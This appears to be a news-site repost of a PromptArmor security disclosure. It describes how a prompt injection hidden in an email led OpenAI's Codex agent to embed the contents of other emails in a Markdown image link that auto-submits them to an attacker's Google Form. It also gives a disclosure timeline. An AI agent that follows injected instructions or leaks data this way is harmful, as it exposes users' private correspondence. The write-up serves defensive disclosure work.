cd /news/ai-safety/codex-exfiltrates-connector-data · home topics ai-safety article
[ARTICLE · art-45549] src=promptarmor.com ↗ pub= topic=ai-safety verified=true sentiment=↓ negative

Codex Exfiltrates Connector Data

Researchers at PromptArmor demonstrated that a malicious email could manipulate OpenAI's Codex for Everything to exfiltrate the complete contents of other emails via an indirect prompt injection, sending the data to an attacker-controlled Google Form. The vulnerability was responsibly disclosed on April 21, 2026, and has been remediated by OpenAI.

read2 min views1 publishedJun 30, 2026
Codex Exfiltrates Connector Data
Image: source

Overview #

‘Codex for Everything’ is an update to Codex that enables its use beyond coding, for day-to-day tasks. It includes over 90 new plugins and features, such as ‘browser use’ and ‘computer use’, that make Codex an all-purpose agent in a bid to compete with Anthropic’s Claude Cowork and Microsoft’s Copilot Cowork.

In this article, we demonstrate that a malicious email could manipulate Codex for Everything to exfiltrate the complete contents of other emails Codex was reviewing. Exfiltration occurred via outputting a malicious image, which triggered an automatic submission to an attacker-controlled Google form.

We demonstrate the vulnerability via an indirect prompt injection in an untrusted email, but an injection in any untrusted data source could exploit the vulnerability across Codex use cases.

This vulnerability was responsibly disclosed on April 21, 2026, and has been remediated by OpenAI. More details on the responsible disclosure are at the end of the article.

The Attack Chain #

A user asks Codex for help reviewing emails

OpenAI's Email plugin comes with a Skill for triaging emails, and reviewing emails is part of a demonstrated use case in theCodex for Everythingrelease.### A prompt injection is hidden in one of the emails Codex finds

The user’s inbox contains an email from an external party that includes a prompt injection.

Email content is not displayed to the user during Codex’s review process.### Codex is manipulated to output an insecure image, triggering data exfiltration

Codex is manipulated to generate and output Markdown image syntax that contains a pre-filled Google Form submission link, populated with the victim's email data. This automatically submits the victims' emails to an attacker-controlled Google Form.

No user interaction is required beyond submission of the initial email triage query.### The attacker can view the victim’s emails in their Google Form submissions

This attack exfiltrated sensitive emails, including legal correspondence, organizational financial planning, and security-related notifications.

Responsible Disclosure #

This vulnerability was responsibly disclosed on Apr 21, 2026, and the vulnerability has been remediated by OpenAI.

Timeline

Apr 21, 2026 PromptArmor discloses to OpenAI via HackerOne

May 6, 2026 HackerOne requests additional details

May 6, 2026 PromptArmor follows up

May 14, 2026 HackerOne validates and triages the vulnerability

May 21, 2026 Public disclosure

── more in #ai-safety 4 stories · sorted by recency
── more on @openai 3 stories trending now
sponsored brought to you by zahid.host 4,200+ EU-deployed projects
reading about agents? ship yours in a single git push.

Run your AI side-project on zahid.host

EU-based hosting, git-push deploys, automatic HTTPS, no cold starts. Free tier with a custom domain — perfect for shipping the agent you just read about.

$git push zahid main
Live at https://your-agent.zahid.host
Get free account → Pricing
from €0/mo · no card required
LIVE [news/codex-exfiltrates-co…] indexed:0 read:2min 2026-06-30 ·